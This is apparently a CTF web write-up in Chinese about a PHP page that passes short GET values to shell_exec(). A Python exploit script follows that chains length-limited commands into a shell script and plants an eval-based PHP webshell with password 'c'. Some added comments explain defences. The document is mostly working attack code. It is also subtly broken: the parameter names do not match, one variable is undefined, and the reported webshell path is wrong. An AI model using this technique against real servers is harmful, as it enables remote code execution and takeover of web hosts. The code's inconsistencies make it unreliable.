CTF_web
源码如下 :
<?php
// Vulnerable handler: the only control on $_GET[1] is a length check (< 8
// characters). The value is then handed verbatim to shell_exec() and the
// command output is echoed back to the client.
// A length limit is not a mitigation for passing request data to a shell;
// the fix is to not invoke a shell with user-controlled input at all.
if(strlen($_GET[1])<8){
    echo shell_exec($_GET[1]);
}
?>
分析
这个challenge如果要写入一个 shell 的话
必须要求当前目录有写权限
下面给出利用脚本
利用代码 :
#!/usr/bin/env python
# encoding: utf-8
import requests
import base64
# Target endpoint (the PHP handler shown above) and the query-parameter name
# the handler reads; every request below is url + "?" + arg + "=" + payload.
url = "http://127.0.0.1/CTF_web/exec/exec3.php"
arg = "c"
def add_slashes(cmd):
    """Prefix shell-significant characters in *cmd* with a backslash.

    Note the order: "." is escaped first, and the following replace of "\\"
    then doubles that inserted backslash, so a "." ends up as "\\\\." while the
    remaining characters get a single backslash each.
    """
    cmd = cmd.replace(".", "\\.")
    cmd = cmd.replace("\\", "\\\\")
    cmd = cmd.replace("/", "\\/")
    cmd = cmd.replace("|", "\\|")
    cmd = cmd.replace("&", "\\&")
    cmd = cmd.replace("-", "\\-")
    cmd = cmd.replace("<", "\\<")
    cmd = cmd.replace(">", "\\>")
    cmd = cmd.replace("#", "\\#")
    cmd = cmd.replace(" ", "\\ ")
    cmd = cmd.replace("=", "\\=")
    return cmd
def exec_cmd(cmd, max_length):
    """Run *cmd* through the length-limited handler.

    If the escaped command fits under *max_length* it is sent in one request.
    Otherwise it is split into fragments; each fragment is sent as a
    redirection (">fragment\\\\"), so the server's working directory ends up
    holding one file per fragment, and two final requests ("ls -t>1", "sh 1")
    reassemble and execute them. This is why the write-up stresses that the
    technique depends on the web server's current directory being writable —
    from a defensive view, a read-only document root and monitoring for
    newly created files there (or for ">" in request parameters) break it.
    """
    print "[+] cmd : %s" % (cmd)
    cmd = add_slashes(cmd)
    print "[+] Full cmd : %s" % (cmd)
    if len(cmd) < max_length:
        # Short path: send directly. The slice drops the trailing 1192
        # characters of the response, presumably page boilerplate — unverified.
        return requests.get(url + "?" + c + "=" + cmd).text[:-1135 - 57]
    # Payload budget per request: the leading ">" plus the trailing "\\"
    # (two characters) are reserved, the rest carries the fragment.
    every_length = max_length - len(">") - len("\\\\")
    # Python 2 integer division: number of full-size fragments.
    times = len(cmd) / every_length
    # Do not let a fragment boundary fall right after a lone backslash:
    # insert an extra one so the escape stays intact when the pieces are
    # concatenated again.
    for i in range(1, times + 1, 1):
        index = i * every_length - 1
        if cmd[index] == "\\":
            cmd = cmd[0:index] + "\\" + cmd[index:]
    cmds = []
    for i in xrange(times):
        every = cmd[every_length * i:every_length * (i+1)]
        # Each piece becomes a line-continued file name; a triple backslash
        # produced by the boundary fix-up above is collapsed to a double one.
        true_cmd = ">%s\\\\" % (every)
        cmds.append(true_cmd.replace("\\\\\\", "\\\\"))
    # The remainder (possibly just ">" when the split was exact).
    end_cmd = ">%s" % (cmd[times * every_length:])
    if len(end_cmd) == 1:
        # Nothing left over: strip the continuation from the last full piece.
        cmds[-1] = cmds[-1][0:-2]
    cmds.append(end_cmd)
    # Sent in reverse so that "ls -t" (newest first) yields the original order.
    for i in cmds[::-1]:
        target = url + "?" + arg + "=" + i
        print "[+] Sending : %s" % (target)
        requests.get(target)
    # Write the file listing (time-ordered) into "1", then run it as a script.
    requests.get(url + "?" + arg + "=" + "ls -t>1")
    requests.get(url + "?" + arg + "=" + "sh 1")
# Two staged commands: first a base64-encoded file "6" is written, then it is
# decoded into "c.php". Both go through the 7-character limit handler.
exec_cmd("echo %s>6" % (base64.b64encode("<?php eval($_GET[c]);?>")), 7)
exec_cmd("cat 6|base64 -d>c.php", 7)
print "[%s]" % ("-" * 64)
print "[+] Upload webshell successful!"
# NOTE(review): url already ends in "exec3.php", so this prints the two names
# joined without a separator; the message does not reflect the real location.
print "[+] Webshell is stored at : %s" % (url + "c.php")
print "[+] password : c"
print "[%s]" % ("-" * 64)